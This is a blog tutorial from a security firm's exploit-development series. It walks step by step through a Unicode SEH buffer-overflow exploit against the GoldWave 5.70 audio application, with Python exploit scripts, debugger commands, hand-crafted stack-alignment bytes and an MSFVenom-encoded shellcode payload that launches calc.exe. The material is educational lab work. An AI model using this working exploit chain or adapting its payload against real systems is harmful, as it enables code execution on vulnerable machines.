Cybersecurity

The Basics of Exploit Development 4: Unicode Overflows

Coalfire Cybersecurity Team

July 10, 2020
Blog Images 2022 07 10 Bowden Tile

This content is provided "as is" and is more than a year old. No representations are made that the content is up-to date or error-free.

Introduction

If you have read the previous articles in this series, welcome back and keep reading. If not, I would encourage you to read those first before proceeding, as this article builds on concepts laid down in the previous installments. In this article, we will be covering a technique similar to the one in the second installment of this series but with the twist of the character encoding of the input being in Unicode. In order to demonstrate how to get around this impediment, we will be writing parts of the payload and doing some stack realignment manually.

Setup

This guide was written to run on a fresh install of Windows 10 Pro (either 32-bit or 64-bit should be fine) and as such you should follow along inside a Windows 10 virtual machine. This vulnerability has also been tested on Windows 7, however, the offsets in this article are the ones from the Windows 10 machine and subsequently may differ on your Windows 7 installation. The steps to recreate the exploit are exactly the same.

You will need a copy of X64dbg which can be downloaded from the official website and you will also need a copy of the ERC plugin for X64dbg from here. If you already have a copy of X64dbg and the ERC plugin installed, connecting to any process and running “ERC --Update” will download and install the latest 32-bit and 64-bit plugins, after which you can restart the debugger. As the vulnerable application we will be working with is a 32-bit application, it will be necessary to either download the 32-bit version of the plugin binaries or to compile the plugin manually. Instructions for installing the plugin can be found on the Coalfire GitHub page.

If you’re using Windows 7 and  X64dbg with the plugin installed, and it crashes and exits when starting, you may need to install .Net Framework 4.7.2 which can be downloaded here.
Finally, you will need a copy of the vulnerable application (Goldwave 5.70) which can be found here. In order to confirm everything is working, start X64dbg and select File -> Open, then navigate to where you installed Goldwave570.exe and select the executable. Click through the breakpoints and the Goldwave GUI interface should pop up. Now in X64dbg’s terminal type:

Command:
ERC --help

You should see the following output:
X64bgd open, running the ERC plugin and attached to Goldwave570.exeX64bgd open, running the ERC plugin and attached to Goldwave570.exe  
Let’s get started!

What is Unicode?

Unicode is a character encoding scheme. There are lots of languages with lots of characters that computers should ideally display. Unicode assigns each character a unique number, or code point.

Originally when 8-bit computers were the apex of our capability, ASCII was created to cover the dominant language in computing at the time which was English. ASCII mapped characters to numbers (originally at a maximum of 7 bits (127) but was later expanded to 8 bits to cover characters from other languages) and having 26 characters in the alphabet in both upper and lower case, numbers and punctuation worked quite well for a time.

However, over time the need arose to provide characters in all languages, and this simply could not be done with 255 bits. Thus, more character encodings were needed.

Unicode provides a solution to this problem by using a variable number of bytes per character. There are multiple UTF (Unicode Transformation Format) encodings, which all work in a similar manner. You choose a unit size, which for UTF-8 is 8 bits, for UTF-16 is 16 bits (UTF-16 is what Windows defines as “Unicode”), and for UTF-32 is 32 bits. The standard then defines a few of these bits as flags: if they're set, then the next unit in a sequence of units is to be considered part of the same character. If they're not set, this unit represents one character fully. Thus the most common (English) characters only occupy one byte in UTF-8 (two in UTF-16, 4 in UTF-32), but other language characters can occupy six bytes or more.

Now that Unicode has been defined as a multibyte character encoding, you need to know what to look for in our debugger. When an input string of “AAAA…” is used, it will no longer be shown as “41414141…” due to the fact that as mentioned above Windows predominantly uses UTF-16 as its Unicode standard, meaning even basic English characters will be two bytes long.

ASCII:
A      -> 41
ABC -> 414243

Unicode:
A      -> 0041
ABC -> 004100420043

Obviously, these additional null bytes will cause a problem, since any address we wish to overwrite EIP or our SEH registers with will need to contain null bytes. However, we do have some tools to help with those hurdles. More on those later.

Confirming the Vulnerability Exists

This exploit begins with an SEH overwrite similar to the one covered in the second installment of this series. As such we will need to crash the program and confirm that the input we provided overwrites an SEH handler.

To begin, use the following python code to generate the input:

1. f = open("crash-1.txt", "wb") 2.   3. buf = b"" 4. buf += b"\x41" * 5000 5.   6. f.write(buf) 7. f.close()


Run this and it will create a file, copy the contents of crash-1.txt to the clipboard. Open Goldwave app, select file then “Open URL” and paste the contents after http://. The application should crash and then you should be able to see what the Unicode input string looks like in memory.

Unicode string in memoryUnicode string in memory

As seen in the image above, the input is being read into memory. However, one byte is being left as is while the other byte absorbs the two null bytes. This is due to the fact that a null byte is the start of the add byte ptr instruction and 0x41 (inc ecx) does not take any values as arguments. As such, changing the values we put in the string can change how the instructions are interpreted in memory. Navigating to the SEH tab, you should see that the first handler has been overwritten with 00410041.

SEH handler overwritten with Unicode AsSEH handler overwritten with Unicode As

Now that we have confirmed the vulnerability exists, it is time to begin developing a full exploit.

Developing the Exploit

At the present moment we know the application is vulnerable to an SEH overflow. We should initially set up our environment, so all our output files are generated in an easily accessible place.

Command:
ERC --Config SetWorkingDirectory <C:\Wherever\you\are\working\from>

Setting the Working DirectorySetting the Working Directory

Now we should set an author so we know who is building the exploit.

Command:
ERC --Config SetAuthor <You>

Setting the AuthorSetting the Author

Now we must identify how far into our buffer the SEH overwrite occurs. For this we will execute the following command in order to generate a pattern using ERC:

Command:
ERC --pattern c 5000

Output of ERC --Pattern c 700Output of ERC --Pattern c 700

We can now add this into our exploit code either directly from the debugger or from the Pattern_Create_1.txt file in our working directory to give us exploit code that looks something like the following.

1. f = open("crash-2.txt", "wb")   2.   3. buf = b""   4. buf += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac"   5. buf += b"9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8"   6. buf += b"Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7A"   7. buf += b"i8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al"   8. buf += b"7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6"   9. buf += b"Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5A"   10. buf += b"r6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au"   11. buf += b"5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4"   12. buf += b"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3B"   13. buf += b"a4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd"   14. buf += b"3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2"   15. buf += b"Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1B"   16. buf += b"j2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm"   17. buf += b"1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0"   18. buf += b"Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9B"   19. buf += b"s0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu"   20. buf += b"9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8"   21. buf += b"Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7C"   22. buf += b"a8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd"   23. buf += b"7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6"   24. buf += b"Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5C"   25. buf += b"j6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm"   26. buf += b"5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4"   27. buf += b"Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3C"   28. buf += b"s4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv"   29. buf += b"3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2"   30. buf += b"Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1D"   31. buf += b"b2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De"   32. buf += b"1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0"   33. buf += b"Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9D"   34. buf += b"k0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm"   35. buf += b"9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8"   36. buf += b"Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7D"   37. buf += b"s8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv"   38. buf += b"7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6"   39. buf += b"Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5E"   40. buf += b"b6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee"   41. buf += b"5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4"   42. buf += b"Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3E"   43. buf += b"k4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En"   44. buf += b"3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2"   45. buf += b"Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1E"   46. buf += b"t2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew"   47. buf += b"1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0"   48. buf += b"Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9F"   49. buf += b"c0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe"   50. buf += b"9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8"   51. buf += b"Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7F"   52. buf += b"k8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn"   53. buf += b"7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6"   54. buf += b"Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5F"   55. buf += b"t6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw"   56. buf += b"5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4"   57. buf += b"Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3G"   58. buf += b"c4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf"   59. buf += b"3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2"   60. buf += b"Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"   61.   62. f.write(buf)   63. f.close()

With this, if we now generate the crash-2.txt file and copy its contents into our vulnerable application, we will encounter a crash. We can now run the FindNRP command in order to identify how far through our buffer the SEH record was overwritten. Appended to the FindNRP command is the -Unicode switch. This switch specifies that the character encoding is UTF-16 (the Windows Unicode default). It only needs to be specified once per debugging session. As such, all further commands will be in Unicode (where applicable) until the debugger is restarted.

Command:
ERC --FindNRP -Unicode

Output of ERC –FindNRP -UnicodeOutput of ERC –FindNRP -Unicode

The output of the FindNRP command above displays that the SEH register is overwritten after 1019 characters in the malicious payload. As such, we will now ensure that our tool output is correct by overwriting our SEH register with Bs and Cs. First, we will need to hit the restart button in order to restart the process and prepare it for another malicious payload. The following exploit code should produce an overwrite of Bs and Cs over the SEH register:  

1. f = open("crash-3.txt", "wb") 2.   3. buf = b"" 4. buf += b"\x41" * 1019 5. buf += b"\x42" * 2 6. buf += b"\x43" * 2 7. buf += b"\x44" * (5000 - len(buf)) 8.   9. f.write(buf) 10. f.close()


SEH Overwrite
SEH Overwrite

As you can see, the SEH register is overwritten with Bs and Cs as expected. Now, to return us back to our exploit code, we will need to find a POP, POP, RET instruction. For a full rundown of how an SEH overflow works, read the previous article in this series. In order to find a suitable pointer to a POP, POP, RET instruction set, we will run the following command. As the character encoding is set as Unicode only, Unicode compatible results will be returned.

Command:
ERC --SEH -ASLR -SafeSEH -Rebase -OSDLL -NXCompat

Output of the ERC --SEH CommandOutput of the ERC --SEH Command  
As you can see, there are a number of options to choose from for POP, POP, RET instructions. Normally when carrying out an SEH overflow, we would execute a POP, POP, RET instruction set and then jump over them. However, this is not possible with Unicode due to the additional null bytes we must deal with. Therefore the address of the POP, POP, RET instruction must not cause the program to crash as we will need to step through it after executing the POP, POP, RET instructions.

Because of that, we decided to go with 004800b3. We can walk through these instructions without crashing the application. At this point, our exploit code should now look something like this:

1. f = open("crash-4.txt", "wb")   2.   3. buf = b""   4. buf += b"\x41" * 1021      #Added 2 bytes to cover nSeh. We will replace these later with Unicode NOPs 5. buf += b"\xB3\x48"         #0x004800b3 | pop ecx, pop ebp, ret 6. buf += b"\x44" * (5000 - len(buf))   7.   8. f.write(buf)   9. f.close()  


We should now test our code and confirm that the POP, POP, RET does work and that we land where we expect to. To do this, place a breakpoint at the address of our POP, POP, RET instruction set:

Landing at POP, POP, RETLanding at POP, POP, RET

With that test it is confirmed that we do land at our POP, POP, RET instruction set and this will return us to our SEH overwrite, which we can step through and this will land us in our payload. Normally this would be our mission complete. However, Unicode payloads are slightly more complex than a normal payload and some additional steps are required.

Aligning the Stack and Positioning our Payload

Under normal circumstances, a payload generated by MSFVenom or a similar tool will have a getPC (Program Counter) routine. However, there is no standard routine for Unicode Overflows. We can manually emulate this code by aligning one of our CPU registers to the address where our shell code begins.

To achieve this, we’ll have to create a Unicode NOP, since 0x90 will not work as the null bytes will crash the application. We need an instruction that—combined with a null byte or two—will not crash the application. For that purpose, use 0x71 and 0x75.

0x75 - Combined with a null byte before and after produces an “add byte ptr ds:[EBP], al” instruction. This does not cause a crash. Our registers indicate that EBP points into the address space of our application.


0x71 – Combined with a single trailing null byte produces a “JNO” (jump if overflow) instruction. This will only execute if the overflag flag (OF) is set, and as such, never activates during this exploit.

Now we will need to input these values between the instructions that we want to execute. We will use 0x75 between specific instructions and 0x71 as an NOP sled. Now all we need to do is align a register to the start of our payload and we have finished our exploit.

Note: A Unicode NOP sled does not technically need a separate instruction. It could simply be achieved using a combination of 0x75 and 0x90. However, we have added in 0x71 to demonstrate a second way of generating a Unicode NOP.

To do so, we will push the value of ESP onto the stack and then pop that value into EAX. Then add and subtract from EAX in order to get the value exactly where we want it.
The final stack alignment instructions should look something like the following:

1. #realigning stack   2. buf += b"\x75"          # Unicode NOP   3. buf += b"\x54"          # Push ESP   4. buf += b"\x75"          # Unicode NOP   5. buf += b"\x58"          # POP EAX   6. buf += b"\x75"          # Unicode NOP   7. buf += b"\x05\xFF\x10"  # ADD EAX,   8. buf += b"\x75"          # Unicode NOP   9. buf += b"\x2d\xEA\x10"  # SUB EAX,   10. buf += b"\x75"  


When read into memory, this will grab our unwanted null bytes and attach them all to the appropriate 0x75 bytes so they do not get in the way of what we are trying to do.

Stack alignment instructions in memoryStack alignment instructions in memory

As we can see, our 0x004800B3 pointer has converted into harmless instructions and our Unicode NOPs have absorbed the unwanted null bytes. We then add 0x1000FF00 to EAX and subtract 0x1000EA00 from it in order to leave EAX with the value of 0x0019E664 or 1190 bytes past the current location of EIP.

This is where our second Unicode NOP comes into play. We will now fill the space between EIP and the address of our final payload with the second NOP (0x71).  Remember, there is a null byte added with each character we inject so we only need half the number of characters as there are bytes between EIP and EAX.

1. f = open("crash-5.txt", "wb")   2.   3. buf = b""   4. buf += b"\x41" * 1019   5. buf += b"\x71\x71"       # Unicode NOP   6. buf += b"\xB3\x48"       # 0x004800b3 | pop ecx, pop ebp, ret   7.   8. #realigning stack   9. buf += b"\x75"           # Unicode NOP   10. buf += b"\x54"           # Push ESP   11. buf += b"\x75"           # Unicode NOP   12. buf += b"\x58"           # POP EAX   13. buf += b"\x75"           # Unicode NOP   14. buf += b"\x05\xFF\x10"   # ADD EAX,   15. buf += b"\x75"           # Unicode NOP   16. buf += b"\x2d\xEA\x10"   # SUB EAX,   17. buf += b"\x75"   18.   19. buf += b"\x71" * 595   20.   21. buf += b"\x44" * (5000 - len(buf))   22.   23. f.write(buf)   24. f.close()  


Finally, all we have to do is create a payload and add it to our shell code and this should be completed.

Finishing the Exploit

In order to create our payload, we will once again be using MSFVenom. To do that, boot up an instance of Kali or wherever you keep a copy of MSFVenom, and run the following command to generate our payload:

Command:
msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegiseter=EAX -f python

MSFVenom Payload GenerationMSFVenom Payload Generation  
After we copy this into our exploit code, it should look something like the following:
 

1. f = open("crash-6.txt", "wb")   2.   3. buf = b""   4. buf += b"\x41" * 1019   5. buf += b"\x71\x71"                  # Unicode NOP   6. buf += b"\xB3\x48"                  # 0x004800b3 | pop ecx, pop ebp, ret   7.   8. #realigning stack   9. buf += b"\x75"                           # Unicode NOP   10. buf += b"\x54"                           # Push ESP   11. buf += b"\x75"                           # Unicode NOP   12. buf += b"\x58"                           # POP EAX   13. buf += b"\x75"                           # Unicode NOP   14. buf += b"\x05\xFF\x10"              # ADD EAX,   15. buf += b"\x75"                                 # Unicode NOP   16. buf += b"\x2d\xEA\x10"              # SUB EAX,   17. buf += b"\x75"   18.   19. buf += b"\x71" * 595   20.   21. #msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -f python   22. buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"   23. buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"   24. buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"   25. buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"   26. buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"   27. buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"   28. buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"   29. buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"   30. buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"   31. buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"   32. buf += b"\x4c\x59\x58\x35\x32\x4b\x50\x4b\x50\x4d\x30\x31\x50"   33. buf += b"\x43\x59\x4b\x35\x50\x31\x39\x30\x42\x44\x54\x4b\x50"   34. buf += b"\x50\x30\x30\x54\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"   35. buf += b"\x4c\x54\x54\x4b\x34\x32\x4f\x38\x4c\x4f\x48\x37\x50"   36. buf += b"\x4a\x4f\x36\x50\x31\x4b\x4f\x36\x4c\x4f\x4c\x31\x51"   37. buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"   38. buf += b"\x4d\x4d\x31\x59\x37\x4a\x42\x4a\x52\x42\x32\x51\x47"   39. buf += b"\x34\x4b\x50\x52\x4c\x50\x34\x4b\x30\x4a\x4f\x4c\x54"   40. buf += b"\x4b\x30\x4c\x4e\x31\x34\x38\x4b\x33\x30\x48\x4b\x51"   41. buf += b"\x4a\x31\x30\x51\x54\x4b\x50\x59\x4d\x50\x4d\x31\x5a"   42. buf += b"\x33\x44\x4b\x31\x39\x4c\x58\x39\x53\x4e\x5a\x30\x49"   43. buf += b"\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x4e\x51\x4b"   44. buf += b"\x4f\x36\x4c\x59\x31\x38\x4f\x4c\x4d\x4b\x51\x49\x37"   45. buf += b"\x4e\x58\x4b\x30\x52\x55\x4b\x46\x4c\x43\x43\x4d\x4c"   46. buf += b"\x38\x4f\x4b\x43\x4d\x4e\x44\x42\x55\x5a\x44\x30\x58"   47. buf += b"\x54\x4b\x52\x38\x4e\x44\x4b\x51\x59\x43\x31\x56\x34"   48. buf += b"\x4b\x4c\x4c\x50\x4b\x34\x4b\x50\x58\x4d\x4c\x4b\x51"   49. buf += b"\x39\x43\x44\x4b\x4d\x34\x44\x4b\x4b\x51\x4a\x30\x35"   50. buf += b"\x39\x30\x44\x4d\x54\x4d\x54\x31\x4b\x51\x4b\x53\x31"   51. buf += b"\x50\x59\x50\x5a\x32\x31\x4b\x4f\x49\x50\x31\x4f\x31"   52. buf += b"\x4f\x31\x4a\x34\x4b\x4e\x32\x4a\x4b\x54\x4d\x51\x4d"   53. buf += b"\x51\x5a\x4b\x51\x54\x4d\x54\x45\x46\x52\x4b\x50\x4d"   54. buf += b"\x30\x4b\x50\x32\x30\x33\x38\x4e\x51\x34\x4b\x42\x4f"   55. buf += b"\x34\x47\x4b\x4f\x49\x45\x57\x4b\x5a\x50\x38\x35\x45"   56. buf += b"\x52\x52\x36\x42\x48\x37\x36\x34\x55\x47\x4d\x55\x4d"   57. buf += b"\x4b\x4f\x4a\x35\x4f\x4c\x4c\x46\x33\x4c\x4c\x4a\x43"   58. buf += b"\x50\x4b\x4b\x39\x50\x33\x45\x4d\x35\x47\x4b\x50\x47"   59. buf += b"\x4e\x33\x42\x52\x42\x4f\x31\x5a\x4b\x50\x50\x53\x4b"   60. buf += b"\x4f\x49\x45\x52\x43\x53\x31\x42\x4c\x53\x33\x4e\x4e"   61. buf += b"\x32\x45\x34\x38\x53\x35\x4b\x50\x41\x41"   62.   63. buf += b"\x44" * (5000 - len(buf))   64.   65. f.write(buf)   66. f.close()  


Now all we have to do is run the code, copy the contents of crash-6.txt to our copy buffer, and inject them into our application and watch calc.exe pop up for us.

Completed exploitCompleted exploit
 

Conclusion

For a substantial amount of time, it was believed that Unicode overflows were not exploitable and that they could only be used to cause a denial of service condition. However, in 2002, Chris Anley published a paper demonstrating this conclusion to be false. If you would like some further reading on this topic, I would suggest reading Building IA32 'Unicode-Proof' Shellcodes paper published in Phrack in 2003.